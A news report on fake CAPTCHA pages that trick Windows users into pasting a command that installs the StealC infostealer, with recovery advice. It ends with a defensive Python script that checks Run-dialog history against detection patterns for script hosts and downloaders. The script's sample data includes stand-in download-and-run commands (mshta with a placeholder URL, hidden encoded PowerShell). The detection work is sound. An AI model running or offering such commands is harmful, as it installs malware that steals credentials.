A new scam is exploiting a familiar internet security check — tricking people into compromising their own computers.
The Identity Theft Resource Center (ITRC) is warning that criminals are using realistic-looking fake CAPTCHA pages to trick Windows users into running malicious commands that install information-stealing malware.
CAPTCHAs are commonly used to verify that a user is human, often by asking them to click images or check a box. But in this scam, the page prompts users to follow a series of keyboard steps to continue.
Those instructions may tell users to press the Windows key and “R,” then “Ctrl + V,” then hit Enter.
According to the ITRC, following those steps opens a hidden command box, pastes a malicious script from the clipboard and runs it, downloading malware onto the computer.
Security researchers have identified the malware as “StealC,” which is designed to quietly collect sensitive data. That can include saved passwords, login credentials and other information stored in your browser.
A legitimate CAPTCHA will never ask users to run commands or use keyboard shortcuts. If you encounter a page that does, close it immediately.
Those who believe they may have followed the instructions should act quickly. The ITRC recommends disconnecting from the internet, running a full antivirus scan and changing passwords using a separate, unaffected device. Users should also monitor financial accounts for suspicious activity.
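For readers who want to check whether those keyboard steps were carried out on a PC: Windows keeps a history of commands entered in the Run dialog in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The Python below is an added example, not code from the ITRC or this report; it flags history entries that pair a script host or downloader with a URL or with hidden-window or encoded-command switches. The function names are hypothetical and the sample values are constructed.

```python
import re

# Programs that can fetch or run script content when started from the Run dialog.
INTERPRETER = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|"
    r"curl|certutil|bitsadmin|msiexec)(\.exe)?\b", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)
# PowerShell switches that hide the window or accept an encoded command.
HIDDEN_OR_ENCODED = re.compile(
    r"(?:^|\s)-(?:(?:w|windowstyle)\s+h(?:idden)?\b|(?:e|enc|encodedcommand)\s)",
    re.IGNORECASE)


def runmru_commands(values):
    """Return Run-dialog commands, newest first, from a dict of RunMRU values."""
    # Each stored command carries a trailing "\1" marker; drop it.
    return [values[n].removesuffix("\\1")
            for n in values.get("MRUList", "") if n in values]


def reasons(command):
    """List why a command looks like a pasted download-and-run one-liner."""
    found = []
    if INTERPRETER.search(command):
        if URL.search(command):
            found.append("script host or downloader given a URL")
        if HIDDEN_OR_ENCODED.search(command):
            found.append("hidden window or encoded command")
    return found


def review(values):
    """Return (command, reasons) pairs for entries worth a closer look."""
    return [(c, r) for c in runmru_commands(values) if (r := reasons(c))]


# Constructed sample values, shaped like a RunMRU export (not real data).
SAMPLE = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "mshta https://example.invalid/verify\\1",
    "d": "powershell -w hidden -enc PLACEHOLDER\\1",
}

if __name__ == "__main__":
    for command, why in review(SAMPLE):
        print(f"{command}  <-  {'; '.join(why)}")
```

On a real machine the same dictionary can be filled from the registry key above, for example with Python's standard `winreg` module. An empty result does not prove the machine is clean, since the history can be cleared.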